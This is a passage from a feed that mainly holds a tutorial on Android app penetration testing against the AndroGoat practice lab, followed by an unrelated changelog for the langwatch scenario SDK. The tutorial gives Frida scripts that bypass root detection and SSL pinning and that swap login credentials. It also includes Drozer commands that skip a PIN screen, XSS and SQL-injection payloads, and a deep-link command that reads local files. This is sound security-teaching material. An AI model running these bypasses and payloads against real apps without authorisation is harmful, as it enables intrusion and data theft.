href="https://github.com/skylot/jadx">JadxGUI</a>. First, let’s install the lab using: adb install AndroGoat.apk</p><p><strong>Decompile the APK file using jadx GUI</strong>, add the <strong>APK file</strong> to the <strong>jadxGUI</strong> tool, and the output will look like the following</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Bp8duix32MYgTsCg-I7POQ.png"></figure><p>As you can see, it’s easy to search for different things inside the decompiled APK. For example, we findpromocode = "NEW2019"<strong>It is a security issue</strong>. If we open the <strong>AndroGoat app </strong>and go to the <strong>Hardcode Issue section</strong>, we see that the <strong>price</strong> is <strong>2000</strong>, but after we use the promo code we found, we’ll get a <strong>discounted</strong> <strong>price</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/482/1*5lUWQKFdJRxL-ivvSYp2Ow.png"></figure><p><strong>Now</strong>, let’s use the <strong>apktool</strong></p><pre>apktool d AndroGoat.apk -o AndroGoat_output # d for decompile the app # -o the output directory</pre><p>In the output directory, you’ll see structures similar to what we saw in <strong>JadxGUI</strong>.</p><p>In our lab, if we explore the files, we’ll find the<strong> Binary Patching section</strong>, which contains an <strong>Administration button</strong> that we can’t access. But think about this: what if we could modify the <strong>decompiled</strong> code behind that button and then <strong>recompile</strong> the app?</p><blockquote><strong>Binary Patching: </strong>Modifying the app’s binary code to alter its behavior, such as disabling security features or enabling hidden functionalities.</blockquote><p>After some search using <strong>JadxGUI</strong> or <strong>apktool</strong>, I found</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EMujz-TDwqc7AWrbH-RP-Q.png"></figure><p>The file res/layout/activity_binary_patching.xmlcontains the following button, which has enabled="false"</p><pre>&lt;Button<br>        android:enabled="false"<br>        android:id="@+id/adminButton"<br>        android:layout_width="match_parent"<br>        android:layout_height="wrap_content"<br>        android:layout_marginLeft="15dp"<br>        android:layout_marginTop="5dp"<br>        android:layout_marginRight="15dp"<br>        android:text="Administration"/&gt;</pre><p>Now we know where the file is located and what we need to change, so let’s go to our <strong>APKTool </strong>output<strong>, </strong><strong>AndroGoat_output/res/layout/activity_binary_patching.xml </strong>then modify the <strong>false</strong> to <strong>true. </strong>Then <strong>recompile</strong> it using the following steps.</p><ul><li><strong>Firstly, </strong>we will create an <strong>unsigned APK file</strong> that Android won’t install because Android <strong>requires</strong> apps to <strong>be signed </strong>to verify integrity and developer identity..</li></ul><pre>apktool b AndroGoat_output -o New_Target_APK_Name.apk # b recombile and -o for the Name of the new APK file</pre><ul><li><strong>Secondly,</strong> <strong>generate a signing key</strong>. It will ask you some questions (name, organization, etc.) and a <strong>password</strong> for the keystore and alias. You can leave them by default.</li></ul><pre>keytool -genkey -v -keystore Any_KeyStore_Name -keyalg RSA -keysize 2048 -validity 1000 -alias Any_Alias_Name<br># -genkey → generate a new key pair.<br># -keystore Any_KeyStore_Name → file where your private key is stored.<br># -keyalg RSA -keysize 2048 → algorithm &amp; key strength (standard).<br># -validity 1000 → number of days the key is valid (e.g., ~3 years).<br># -alias Any_Alias_Name → nickname for your key (you’ll use this later when signing).<br># Also you can use &lt;zipalign&gt; instead of keytool</pre><ul><li><strong>Thirdly,</strong> now use <strong>apksigner</strong> (part of Android SDK build-tools) to sign the APK:</li></ul><pre>apksigner sign --ks Any_KeyStore_Name --ks-key-alias Any_Alias_Name New_AndroGoat.apk<br># --ks → keystore file you created.<br># --ks-key-alias → alias name of your key inside the keystore.<br># New_AndroGoat.apk → unsigned APK to sign.</pre><ul><li><strong>Fourthly,</strong> <strong>verify</strong> the <strong>signature</strong> and <strong>install</strong></li></ul><pre>apksigner verify New_AndroGoat.apk # If it outputs nothing, the signature is valid<br>adb install ./New_AndroGoat.apk # Install the new Android app</pre><p>After we return to the same screen and recheck the <strong>Administration button</strong>, we can now access it <strong>successfully</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6fR5KD9msIOzSM1rFqkSag.png"></figure><h4>Root Access:</h4><p>If we tried to access the <strong>adb shell as root</strong>, we would get</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/555/1*sY6CTQ4RJ5jgQZKxS2TNyA.png"></figure><pre>git clone https://gitlab.com/newbit/rootAVD.git<br>cd rootAVD<br>bash rootAVD.sh ListAllAVDs # To list avds<br># Based on your avd we will use on of the result of rootAVD like the following I use<br>bash rootAVD.sh system-images/android-36/google_apis_playstore/x86_64/ramdisk.img</pre><p>You’ll see that Magisk has been installed, and your <strong>AVD</strong> will <strong>reboot</strong> <strong>automatically</strong>. Then, open the <strong>Magisk app</strong> and execute it within the <strong>Superuser</strong>. After that, you’ll be able to use the ADB shell with root access easily.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/392/1*D78wbjAas8CH1SZD-qQ2Xg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7Ax8T2n2KYudUGK4E6jj8g.png"></figure><p>Now that we have <strong>root access </strong>on our device, we run into a new problem: some applications detect that the device is rooted and<strong> block access</strong>. To bypass this, we need a root detection bypass. Instead of unrooting our emulator (which we still need for testing), we can simply use <strong>Frida to hook</strong> the <strong>isRooted</strong> function and force it to always return <strong>false</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/787/1*92Vyn2xlDGm2kkNQhhBImA.png"></figure><p>Understand how root detection works in the target app. In the AndroidManifest.xml file, you’ll find an activity called RootDetectionActivity.If you analyze its code, you’ll see a method named isRooted() that checks for signs of a rooted device, such as the presence of binaries like su or known root-related packages like Superuser.</p><ul><li>If isRooted() returns trueThe app displays: <strong>“Device is Rooted”</strong>.</li><li>If isRooted() returns falseThe app displays: <strong>“Device is Not Rooted”</strong>.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zj5jio4-ZBaIaV4fASmeuQ.png"></figure><p>Let’s now use the following <strong>script</strong> to bypass it</p><pre>Java.perform(function () {<br><br>    console.log("[*] Root bypass loaded");<br><br>    var RootDetectionActivity = Java.use(<br>        "owasp.sat.agoat.RootDetectionActivity"<br>    );<br><br>    // Bypass isRooted()<br>    RootDetectionActivity.isRooted.implementation = function () {<br>        console.log("[+] isRooted() bypassed");<br>        return false;<br>    };<br><br>    // Bypass isRooted1()<br>    RootDetectionActivity.isRooted1.implementation = function () {<br>        console.log("[+] isRooted1() bypassed");<br>        return false;<br>    };<br><br>});</pre><pre>frida -U -f owasp.sat.agoat -l bypass.js<br># Below, I will explain how to use the Frida tool.</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*41kmcGFd3gElcF9flYVfVQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/737/1*HXD7JZRy4lHBja_squVSzA.png"></figure><h4>Insecure Data Storage: SharedPreferences, DBs, files, external storage:</h4><p>We’ve already explained the concept, but now we’ll look at how it appears in the<strong> AndroGoat lab</strong> under the Insecure Storage section.</p><p><strong>Firstly</strong>, we need to know the <strong>package</strong> of our lab using <strong>adb shell pm list packages | grep "goat"-&gt; Result</strong> -&gt; <strong>package:owasp.sat.agoat</strong>If we go to the following <strong>/data/data/owasp.sat.agoat/</strong>We will see different folders like <strong>cache</strong>, <strong>code_cache</strong>, <strong>databases</strong>, and <strong>shared_prefs. </strong>Suppose username and password are (<strong>admin</strong>: <strong>admin</strong>).</p><p>Firstly, we need to identify the package name of our lab using: <strong>adb shell pm list packages | grep "goat"-&gt; Result</strong> -&gt; <strong>package:owasp.sat.agoat</strong>Next, navigate to: <strong>/data/data/owasp.sat.agoat/</strong>Here, you’ll see different folders like <strong>cache</strong>, <strong>code_cache</strong>, <strong>databases</strong>, and <strong>shared_prefs</strong>.</p><ul><li><strong>shared_prefs, </strong>we will see the <strong>users.xml files</strong>, which contain the <strong>credentials</strong> in XML format. Also, we can edit the file as we want, like the <strong>score.xml </strong>file.</li><li><strong>databases: </strong>pull the <strong>aGoat file, then </strong>use the <strong>SQLite3 command or DB Browser GUI </strong>for better data extraction, as you’ll see.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7ejDNIgvnMBfThAql20uoQ.png"></figure><ul><li><strong>Inside the Side Channel Data Leakage section</strong>, if we go to I<strong>nsecure Logging</strong> and enter a<strong>dminlog:adminlog</strong>, then run the following</li></ul><pre>adb logcat - pid=$(adb shell pidof -s owasp.sat.agoat)<br># we will see everything realted to our target APP</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k5VWQ1EcmmQsCBmECeWf-Q.png"></figure><h3>Drozer:</h3><p>An <strong>Android</strong> application security testing <strong>framework</strong> that helps testers find vulnerabilities. <strong>Drozer has different modules,</strong> each with its own operation. <strong>EX:</strong> Static analysis of an application — Performing enumeration on various packages — Creating Exploits for activities and content providers — Automating SQL injection.</p><p>You can <a href="https://github.com/ReversecLabs/drozer"><strong>install</strong></a> it using <strong>Docker</strong> or <strong>pip</strong> → <strong>pip install drozer</strong> You also need the <a href="https://github.com/ReversecLabs/drozer-agent/releases"><strong>Drozer Agent</strong></a><strong> </strong>installed on your Android device. <strong>Start</strong> the <strong>drozer agent</strong>, then <strong>adb forward tcp:31415 tcp:31415Finally</strong>, <strong>start</strong> the <strong>drozer</strong> <strong>console</strong> by running the <strong>drozer console connect</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lB02ixqE3Jgtd-PneT2QsQ.png"></figure><p>I’ll walk through the <strong>different</strong> <strong>modules</strong> available in <strong>Drozer and ADB</strong>.</p><ul><li>For <strong>Packages</strong><strong>run app.package.list</strong> — list installed packages. <strong>&amp;&amp;</strong> <strong>run app.package.list -f &lt;Name&gt;</strong> — search for a package by name substring. <strong>&amp;&amp;</strong> <strong>run app.package.info -a &lt;package.name&gt;</strong> — <strong>basic info</strong>: permissions, version about our target package.</li><li>For <strong>Activities</strong><strong>run app.activity.info -a &lt;package.name&gt;</strong> —<strong> list activities</strong> that are <strong>exported</strong>. <strong>&amp;&amp;</strong> <strong>run app.activity.start --component &lt;pkg&gt; &lt;ActivityName&gt;</strong> — attempt to <strong>start</strong> an <strong>exported activity</strong>.</li><li>For <strong>Services</strong> <strong>run app.service.info -a &lt;package.name&gt;</strong> — list services and permissions required. <strong>&amp;&amp; </strong><strong>run app.service.start</strong> / <strong>run app.service.stop</strong> — <strong>start</strong> or stop services. <strong>&amp;&amp; </strong><strong>run app.service.send &lt;pkg&gt; &lt;ServiceName&gt; --msg &lt;args&gt; --extra &lt;key&gt; &lt;value&gt;</strong> — interact with started service (send intents/bundles).</li><li>For<strong> Content providers </strong><strong>run app.provider.info -a &lt;package.name&gt;</strong> — <strong>list</strong> providers and permissions. <strong>&amp;&amp; </strong><strong>run scanner.provider.finduris -a &lt;package.name&gt;</strong> — <strong>Enumerate</strong> likely content <strong>URIs</strong> (common attack vector). <strong>&amp;&amp; </strong><strong>run app.provider.query content://... --vertical</strong> — query an accessible content provider URI. &amp; <strong>run app.provider.read content://.../path </strong>— attempt to read local files.</li><li>For <strong>Broadcast receivers </strong><strong>run app.broadcast.info -a &lt;package.name&gt;</strong> — list broadcast receivers and export status. <strong>&amp;&amp;</strong><strong>run app.broadcast.send --action &lt;pkg&gt;.&lt;ReceiverAction&gt; --extra "k=v"</strong> — send crafted intents to receivers.</li></ul><p>There are additional modules and features in Drozer. You can see more details by using the <strong>list</strong> command inside the tool. <a href="https://labs.withsecure.com/tools/drozer">https://labs.withsecure.com/tools/drozer</a> <strong>and</strong> <a href="https://angelica.gitbook.io/hacktricks/mobile-pentesting/android-app-pentesting/drozer-tutorial">https://angelica.gitbook.io/hacktricks/mobile-pentesting/android-app-pentesting/drozer-tutorial</a>.</p><h4>Unprotected Android Components:</h4><p>We need to verify the PIN to be able to log in, but what if we bypass the activity that <strong>handles</strong> this <strong>verification</strong>? If we use <strong>Drozer</strong> to interact with the app’s activities, we can attempt to start the protected activity directly and <strong>bypass the PIN check</strong>. Ex<strong>run app.activity.info -a owasp.sat.agoat</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1007/1*M-nQ6ExzCq7xlwhftPpvJg.png"></figure><ul><li><strong>Start</strong> the exported activity using it, <strong>run app.activity.start --component owasp.sat.agoat owasp.sat.agoat.AccessControl1ViewActivity</strong>and we will <strong>bypass</strong> it <strong>successfully</strong>.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*98gDeRw--mK-a2kY5-6GdQ.png"></figure><h4>Input Validations:</h4><p>Insecure or missing user input validation can introduce serious security vulnerabilities in Android apps, such as <strong>XSS</strong> or <strong>SQLI</strong>, or <strong>LFI</strong>.</p><ul><li><strong>XSS:</strong> If we enter any <strong>value</strong> into the <strong>Name</strong> field, we notice that this value is <strong>reflected</strong> in the page body. Let’s dig deeper by inspecting the <strong>XSSActivity</strong> with <strong>Jadx</strong>. You’ll see that it uses a <strong>WebView</strong>, and, importantly, that <strong>JavaScript is enabled</strong> for this WebView. This setup allows for XSS injection, as user-supplied input is passed directly into the web content without proper sanitization.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AlGib0C1c0aW9GnwqgTGgA.png"></figure><p>Let’s <strong>inject</strong> an <strong>XSS payload</strong> like <strong>&lt;script&gt;alert("Hacked")&lt;/script&gt;</strong> Then you will see a <strong>JavaScript</strong> alert box.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vAy3v097SRKGpz0xJ-Pv7g.png"></figure><ul><li><strong>SQL Injection (SQLI): </strong>When user input is directly included in an SQL statement without proper validation or sanitization, as exists in the <strong>SQLInjectionActivity</strong>, it creates an SQL Injection vulnerability. For example, if we enter: <strong>admin'</strong> This will typically cause an <strong>SQL error</strong> because of the unmatched single quote. To exploit this, we can inject a payload such as: <strong>admin'OR 1=1;--</strong>This statement <strong>alters the original SQL logic</strong> and <strong>returns all users</strong> from the <strong>database</strong>, clearly demonstrating a successful SQL injection attack.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0YR2DtWQAKiT1NFu5pXryw.png"></figure><ul><li><strong>WebView(Local file access): </strong>an attacker can a<strong>ccess local files </strong>if the allow file access is set to true, as exists in the following</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/520/1*fSAs4dQYW4Mgex8FXoJKvA.png"></figure><blockquote><strong>While</strong> <strong>JavaScript</strong> itself is generally <strong>safe</strong>, enabling the following settings can expose your application to <strong>various vulnerabilities</strong>.</blockquote><pre>WebSettings settings = webView.getSettings();<br>settings.setJavaScriptEnabled(true); <br>settings.setAllowFileAccess(true); <br>settings.setAllowContentAccess(true);<br>settings.setAllowFileAccessFromFileURLs(true);<br>settings.setAllowUniversalAccessFromFileURLs(true);</pre><h4>SSL Pinning bypass:</h4><p>There are different ways to <strong>bypass</strong> the SSL pinning.</p><ul><li><strong>For Static review</strong>, <strong>inspect</strong> the application code for pinning libraries — Custom trust managers — <strong>Hardcoded certs </strong>— and <strong>Public keys </strong>in the source or resources.<strong> EX:</strong><strong>network_security_config.xml analysis</strong> — Many apps explicitly configure cleartext traffic permissions and cert pinning here. This file is in res/xml/ and is often the first thing to check after decompiling. Misconfigured entries &lt;base-config cleartextTrafficPermitted="true"/&gt; are instant findings.</li><li><strong>For Dynamic:</strong> we will use different tools like <strong>Objection</strong>, <strong>Frida</strong>, and <strong>Burp</strong> for request interception.</li></ul><h3>Burp Suite:</h3><p>a <strong>web application security testing platform</strong> used to <strong>intercept</strong>, inspect, and manipulate HTTP(S) traffic. created by <a href="https://portswigger.net/burp">https://portswigger.net/burp</a>.</p><p><strong>— Steps to intercept requests using Burp </strong>in Android:</p><ul><li><strong>Run Burp</strong>, then go to the <strong>Add proxy listener</strong> → choose the IP address 192 with port 8080. Then, in the Android emulator, navigate to <a href="http://192/">http://192</a> in <strong>Chrome</strong> and download the <strong>.cert </strong>file. Then, go to <strong>settings</strong>, then more <strong>security and privacy</strong> → <strong>Encryption &amp; credentials </strong>→ install a certificate → choose the certificate downloaded.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*sMX5opySfqiNXPVFTu-raw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/971/1*wtCWxW3shNzBAKqtlCmyoA.png"></figure><ul><li>Go to the <strong>Mobile Network Security</strong> → <strong>Internet</strong> → choose the AndroidWifi →Edit it → change the IP to 192 IP → You can intercept Requests easily.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/440/1*DDYpcwCKLEL59uDyjfxBbw.png"></figure><ul><li><strong>Network Intercepting: If you navigate to the HTTP section inside it, you can intercept requests via the Burp Suite proxy.</strong></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*A21fR1MvVu-nK8YSmOdNtQ.png"></figure><p>However, when we press the <strong>HTTPS</strong> button, an error message appears stating <strong>“please intercept using proxy,”</strong> and no requests are captured in Burp Suite. This indicates that <strong>SSL pinning</strong> is <strong>enabled</strong> in the application, so we need to bypass this protection to intercept HTTPS traffic. To bypass SSL pinning, <strong>several tools</strong> are commonly used: <strong>Frida or Objection.</strong></p><h3>Frida:</h3><p>It is a <strong>free</strong> and open-source dynamic instrumentation toolkit that lets you <strong>inject snippets of JavaScript</strong> into running processes to <strong><em>hook functions</em></strong><em>, inspect/modify memory, intercept APIs, and implement custom runtime behavior</em></p><p>— <strong>How to install it:</strong></p><ol><li>Make sure you have <a href="https://github.com/frida/frida"><strong>Frida</strong></a><strong> installed</strong> on your workstation (laptop/PC): <strong>pip3 install frida-tools</strong></li><li><strong>Identify</strong> Device <strong>Architecture</strong>: Determine the<strong> CPU architecture</strong> for your Android device/emulator. <strong>Run</strong> this <strong>ADB command</strong> to check your device’s architecture <strong>adb shell getprop ro.product.cpu.abi </strong>You will get in response something like<strong> x86_64 </strong>.</li><li><strong>Download</strong> the Corresponding Frida Server: Go to the <a href="https://github.com/frida/frida/releases">official Frida releases page</a> and scroll to assets. <strong>Download</strong> the <strong>frida-server</strong> file that matches your device’s architecture (e.g., <strong>frida-server-&lt;version&gt;-android-x86_64.xz</strong> for x86_64).</li><li><strong>Extract</strong> it with <strong>xz -d frida-server.xz</strong></li><li><strong>Push</strong> and <strong>Run</strong> Frida Server on Your Device: <strong>a]</strong> <strong>Transfer</strong> the server binary to your device <strong>db push frida-server /data/local/tmp/</strong> [<strong>b] Set</strong> executable <strong>permission</strong>: <strong>db shell "chmod 755 /data/local/tmp/frida-server"</strong>[<strong>c]</strong> <strong>Start</strong> Frida server<strong>adb shell "/data/local/tmp/frida-server &amp;"</strong>.</li><li><strong>Run</strong> <strong>frida-ps -Ua</strong>To <strong>confirm</strong> that <strong>Frida</strong> is <strong>running</strong> on your device and to <strong>list</strong> the currently <strong>running</strong> apps.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*a3OMS3uRmr2lilOS8feqiQ.png"></figure><p><strong>— How to use:</strong></p><pre>// hook_android_login.js<br>/*<br>The script hooks the authenticate(String user, String pass) method<br>1. Prints the original username and password sent by the app.<br>2. Replaces them with attacker-controlled values.<br>3. Calls the original authenticate method but using the new credentials.<br>4. Prints the result returned by the original method.<br>5. Returns that result back to the app.<br>*/<br>Java.perform(function () {<br>  var LoginManager = Java.use("com.example.app.LoginManager");<br>  LoginManager.authenticate.overload("java.lang.String","java.lang.String").implementation = function (user, pass) {<br>    console.log("[+] authenticate called. user:", user, "pass:", pass);<br>    // change credentials<br>    var newUser = "attacker";<br>    var newPass = "p@ssw0rd";<br>    console.log("[+] replacing creds with", newUser, newPass);<br>    var result = this.authenticate(newUser, newPass);<br>    console.log("[+] original result:", result);<br>    return result;<br>  };<br>});<br></pre><pre>frida -U -f com.example.app -l hook_android_login.js<br># -U Stands for USB device.Tells Frida to connect to the device.<br># -f Launches the target app (package name) from the beginning before injecting the script.<br># -l Loads your Frida script at startup.</pre><h4>SSL Pinning bypass using frida:</h4><p>You can create your own script to bypass SSL pinning or utilize existing scripts available at <a href="https://codeshare.frida.re/"><strong>https://codeshare.frida.re/</strong></a></p><pre>frida -U --codeshare akabe1/frida-multiple-unpinning -f Package_Name<br># This is an example for ssl pinning bypass</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-_Hl4Wkj56_ZpenjnZtWMw.png"></figure><blockquote>If you <strong>encounter</strong> any <strong>errors</strong> or <strong>problems</strong>, you can use the following repo to automate most of the process with the included scripts. <a href="https://github.com/httptoolkit/frida-interception-and-unpinning"><strong>https://github.com/httptoolkit/frida-interception-and-unpinning</strong></a></blockquote><p><strong>In the end</strong>, you will be able to <strong>bypass</strong> it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KJC7g8A324oHujNytGkZYg.png"></figure><h3><strong>Other Important Topics</strong>:</h3><ul><li><strong>Deep link / App Link hijacking </strong>is one of the most important Android IPC/client-side attack vectors. allow apps to open specific screens directly from <strong>browsers</strong> — <strong>emails</strong> — <strong>QR codes EX: mybank://transfer?id OR </strong><a href="https://bank.example.com/"><strong>https://bank.example.com</strong></a></li></ul><pre>&lt;!-- Example vulnerable manifest --&gt;<br>&lt;intent-filter&gt;<br>    &lt;action android:name="android.intent.action.VIEW"/&gt;<br>    &lt;category android:name="android.intent.category.DEFAULT"/&gt;<br>    &lt;category android:name="android.intent.category.BROWSABLE"/&gt;<br><br>    &lt;data<br>        android:scheme="mybank"<br>        android:host="transfer"/&gt;<br>&lt;/intent-filter&gt;<br></pre><p><strong>Also</strong>, it can lead to accessing<strong> local files</strong>, like the following attack</p><pre>adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=file:///etc/hosts’ </pre><ul><li><strong>Firebase/backend misconfiguration</strong> — Insecure Firebase Realtime Database and Storage rules are found in real apps. Check by looking in the resource files, specifically res/values/strings.xml or by locating the google-services.json config file that is sometimes packaged with the app from the APK, and testing unauthenticated read/write access:</li></ul><pre># Example which contain (.firebaseio.com) but you need to add .json at the end<br>curl "https://your-app.firebaseio.com/.json"<br># If it returns data, unauthenticated read is enabled</pre><ul><li><a href="https://github.com/dwisiswant0/apkleaks"><strong>apkleaks</strong></a><strong> for automated secret scanning</strong> — Running apkleaks -f target.apk -o leaks.jsonautomatically greps for API keys, tokens, and credentials across decompiled output. Faster than manual grep in jadx.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/680/1*gg1vTjeqoDeyt6_TrfVtCg.png"></figure><h3>References:</h3><p><strong>Here</strong> are many references that you can read.</p><ul><li><a href="https://github.com/imran-parray/Mind-Maps/tree/master"><strong>GitHub — imran-parray/Mind-Maps: Mind-Maps of Several Things</strong></a></li><li><a href="https://github.com/DevHackz/Android-Pentesting"><strong>https://github.com/DevHackz/Android-Pentesting</strong></a></li><li><a href="https://github.com/dn0m1n8tor/AndroidPentest101"><strong>https://github.com/dn0m1n8tor/AndroidPentest101</strong></a></li><li><a href="https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet"><strong>https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet</strong></a></li><li><a href="https://github.com/Hrishikesh7665/Android-Pentesting-Checklist"><strong>https://github.com/Hrishikesh7665/Android-Pentesting-Checklist</strong></a></li><li><a href="https://github.com/B3nac/Android-Reports-and-Resources"><strong>https://github.com/B3nac/Android-Reports-and-Resources</strong></a></li><li><a href="https://xmind.app/m/GkgaYH/#"><strong>https://xmind.app/m/GkgaYH/#</strong></a></li></ul><p><strong>Follow me</strong> on <a href="https://x.com/khaledyasse1882"><strong>X</strong></a> and <a href="https://www.linkedin.com/in/khaled-yassen-40a826206/"><strong>LinkedIn</strong></a></p><a href="https://medium.com/media/016ac8bc0f8343255720d2264a0c0370/href">https://medium.com/media/016ac8bc0f8343255720d2264a0c0370/href</a><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5fc2fc68fc5d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/android-app-penetration-testing-from-apk-decompilation-to-runtime-exploitation-tools-and-labs-5fc2fc68fc5d">Android App Penetration Testing: From APK Decompilation to Runtime Exploitation [Tools and Labs]</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[javascript: v0.4.13]]></title>
<description><![CDATA[0.4.13 (2026-06-11)
Bug Fixes

deps: close 16 npm security alerts in scenario examples (#637) (ced16fe)
deps: close 25 npm security alerts in docs and the JS SDK (#620) (ca91380)
deps: close CRITICAL shell-quote and uuid alerts in JS SDK (#636) (abdc38f)
voice/#623: reframe realtime agent audio t...]]></description>
<link>https://tsecurity.de/de/3590171/it-security-tools/javascript-v0413/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590171/it-security-tools/javascript-v0413/</guid>
<pubDate>Thu, 11 Jun 2026 12:34:22 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/javascript/v0.4.12...javascript/v0.4.13">0.4.13</a> (2026-06-11)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>deps:</strong> close 16 npm security alerts in scenario examples (<a href="https://github.com/langwatch/scenario/issues/637" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/637/hovercard">#637</a>) (<a href="https://github.com/langwatch/scenario/commit/ced16fee797723c49c4a67036065c7ddafc47eed">ced16fe</a>)</li>
<li><strong>deps:</strong> close 25 npm security alerts in docs and the JS SDK (<a href="https://github.com/langwatch/scenario/issues/620" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/620/hovercard">#620</a>) (<a href="https://github.com/langwatch/scenario/commit/ca91380ff41430eb16bdfd31833453be40b047f9">ca91380</a>)</li>
<li><strong>deps:</strong> close CRITICAL shell-quote and uuid alerts in JS SDK (<a href="https://github.com/langwatch/scenario/issues/636" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/636/hovercard">#636</a>) (<a href="https://github.com/langwatch/scenario/commit/abdc38f171762c41df1df353c617697c7afea188">abdc38f</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615757477" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/623" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/623/hovercard" href="https://github.com/langwatch/scenario/issues/623">#623</a>:</strong> reframe realtime agent audio turns so the voiced sim does not echo them (<a href="https://github.com/langwatch/scenario/issues/653" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/653/hovercard">#653</a>) (<a href="https://github.com/langwatch/scenario/commit/9302877d9b98e6e5be25e85aee854151a958b28f">9302877</a>)</li>
<li><strong>voice/sdk/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420616171" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/451" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/451/hovercard" href="https://github.com/langwatch/scenario/issues/451">#451</a>:</strong> stop re-stringifying input_audio array in event-reporter (<a href="https://github.com/langwatch/scenario/issues/639" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/639/hovercard">#639</a>) (<a href="https://github.com/langwatch/scenario/commit/d5188d369f979b7c8ddfe56e8268567ea99e99c3">d5188d3</a>)</li>
<li><strong>voice/sdk/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420616171" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/451" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/451/hovercard" href="https://github.com/langwatch/scenario/issues/451">#451</a>:</strong> stop re-stringifying input_audio array in event-reporter (see+listen) (<a href="https://github.com/langwatch/scenario/commit/d5188d369f979b7c8ddfe56e8268567ea99e99c3">d5188d3</a>)</li>
<li><strong>voice+judge:</strong> surface dropped model tool calls (<a href="https://github.com/langwatch/scenario/issues/630" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/630/hovercard">#630</a> + <a href="https://github.com/langwatch/scenario/issues/631" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/631/hovercard">#631</a>) (<a href="https://github.com/langwatch/scenario/issues/635" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/635/hovercard">#635</a>) (<a href="https://github.com/langwatch/scenario/commit/de60f82c2dadc20d2081bf4f3cbbd3c332442070">de60f82</a>)</li>
<li><strong>voice:</strong> hosted ElevenLabs single-exchange ceiling — docs + enriched timeout error (<a href="https://github.com/langwatch/scenario/issues/643" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/643/hovercard">#643</a>) (<a href="https://github.com/langwatch/scenario/commit/aae16beec4d5b74ee331c29ad960c43632434da0">aae16be</a>)</li>
<li><strong>voice:</strong> surface tool-only realtime turns (no audio chunk) (<a href="https://github.com/langwatch/scenario/issues/647" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/647/hovercard">#647</a>) (<a href="https://github.com/langwatch/scenario/commit/6041447b1740646c6543e951096f00031dd825dc">6041447</a>)</li>
</ul>
<h3>Miscellaneous</h3>
<ul>
<li><strong>deps/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590356413" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/608" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/608/hovercard" href="https://github.com/langwatch/scenario/issues/608">#608</a>:</strong> migrate elevenlabs@1.59.0 → @elevenlabs/elevenlabs-js (<a href="https://github.com/langwatch/scenario/issues/611" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/611/hovercard">#611</a>) (<a href="https://github.com/langwatch/scenario/commit/6498df44265f3f0cfc9a5262809ba65501d721db">6498df4</a>)</li>
